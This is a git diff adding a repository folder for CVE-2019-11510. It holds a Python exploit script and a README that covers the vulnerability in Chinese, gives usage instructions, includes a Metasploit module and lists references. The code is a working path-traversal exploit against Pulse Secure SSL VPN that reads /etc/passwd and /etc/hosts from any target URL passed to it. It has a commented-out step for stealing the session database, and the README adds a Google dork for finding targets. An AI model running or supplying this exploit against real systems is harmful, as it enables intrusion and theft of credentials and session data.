diff --git a/CVE-2019-11510/CVE-2019-11510.jpg b/CVE-2019-11510/CVE-2019-11510.jpg new file mode 100644 index 0000000..a9f8d8c Binary files /dev/null and b/CVE-2019-11510/CVE-2019-11510.jpg differ diff --git a/CVE-2019-11510/CVE-2019-11510.py b/CVE-2019-11510/CVE-2019-11510.py new file mode 100644 index 0000000..76c8009 --- /dev/null +++ b/CVE-2019-11510/CVE-2019-11510.py @@ -0,0 +1,93 @@ +import requests +import requests.packages.urllib3 +requests.packages.urllib3.disable_warnings() +import os +import sys + + +banner = ''' + _______ ________ ___ ___ __ ___ __ __ _____ __ ___ + / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ /_ | ____/_ |/ _ \ + | | \ \ / /| |__ ______ ) | | | || | (_) |______| || | |__ | | | | | + | | \ \/ / | __|______/ /| | | || |\__, |______| || |___ \ | | | | | + | |____ \ / | |____ / /_| |_| || | / / | || |___) || | |_| | + \_____| \/ |______| |____|\___/ |_| /_/ |_||_|____/ |_|\___/ + + Any file read and admin Rce + + python By jas502n +''' +print banner + +def etc_passwd(url): + file_read = ['/etc/passwd', '/etc/hosts'] + if url[-1] == '/': + vuln_url_1 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0] + vuln_url_2 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1] + output = url[8:-1] + + mdb_url = url + "dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/" + else: + vuln_url_1 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0] + vuln_url_2 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1] + output = url[8:] + + mdb_url = url + "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/" + + r1 = requests.get(vuln_url_1, verify=False) + r2 = requests.get(vuln_url_2, verify=False) + # r3 = requests.get(mdb_url, verify=False) + + # print r3.status_code + # print r3.content + + # file_mdb = open("data_runtime_mtmp_lmdb_dataa_data.mdb",'ab') + # file_mdb.write(r3.content) + # file.close + + + if r1.status_code == 200 and 'root:x' in r1.text: + print + print url + " ---------------> Vulnerable" + print "Writing all files to output file " + output + print "\nExtracting " + file_read[0] + print + print vuln_url_1 + print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" + print r1.text + print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" + + # os.system('mkdir %s' % output) + + f = open("c.txt","wb") + f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n') + f.write(file_read[0] + '\n\n' + r1.text+'\n') + f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n') + + if r2.status_code == 200 and 'localhost' in r2.text: + print "Extracting " + file_read[1] + print + print vuln_url_2 + print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" + print r2.text + print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" + f.write(file_read[1] + '\n\n' + r2.text+'\n') + f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n') + f.close() + + + + else: + print url + " ---------------> Not Vulnerable" + + + + + + + +if __name__ == '__main__': + + url = sys.argv[1] + etc_passwd(url) + diff --git a/CVE-2019-11510/README.md b/CVE-2019-11510/README.md new file mode 100644 index 0000000..a5723ad --- /dev/null +++ b/CVE-2019-11510/README.md @@ -0,0 +1,105 @@ +# CVE-2019-11510-1 + +## Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) + +## 漏洞简介 +Pulse Secure Pulse Connect Secure(又名PCS,前称Juniper Junos Pulse)是美国Pulse Secure公司的一套SSL VPN解决方案。 Pulse Secure PCS 9.0RX版本、8.3RX版本和8.2RX版本中存在授权问题漏洞。该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。 + +## python usage: + +`python CVE-2019-11510.py https://x.x.x.x` + +![](./CVE-2019-11510.jpg) + + + +## 漏洞EXP(MSF的ruby语言的EXP) + +```ruby +# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) +# Google Dork: inurl:/dana-na/ filetype:cgi +# Date: 8/20/2019 +# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera +# Vendor Homepage: https://pulsesecure.net +# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 +# Tested on: Linux +# CVE : CVE-2019-11510 +require 'msf/core' +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Post::File + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Pulse Secure - System file leak', + 'Description' => %q{ + Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. + This exploit reads /etc/passwd as a proof of concept + This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 + }, + 'References' => + [ + [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] + ], + 'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => + { + 'RPORT' => 443, + 'SSL' => true + }, + )) + + end + + + def run() + print_good("Checking target...") + res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) + + if res && res.code == 200 + print_good("Target is Vulnerable!") + data = res.body + current_host = datastore['RHOST'] + filename = "msf_sslwebsession_"+current_host+".bin" + File.delete(filename) if File.exist?(filename) + file_local_write(filename, data) + print_good("Parsing file.......") + parse() + else + if(res && res.code == 404) + print_error("Target not Vulnerable") + else + print_error("Ooof, try again...") + end + end + end + def parse() + current_host = datastore['RHOST'] + + fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r") + words = 0 + while (line = fileObj.gets) + printable_data = line.gsub(/[^[:print:]]/, '.') + array_data = printable_data.scan(/.{1,60}/m) + for ar in array_data + if ar != "............................................................" + print_good(ar) + end + end + #print_good(printable_data) + + end + fileObj.close + end +end +``` + +### 参考链接: + +https://github.com/jas502n/CVE-2019-11510-1 + +https://hackerone.com/reports/591295 + +https://github.com/projectzeroindia/CVE-2019-11510 + +https://www.anquanke.com/vul/id/1589103 \ No newline at end of file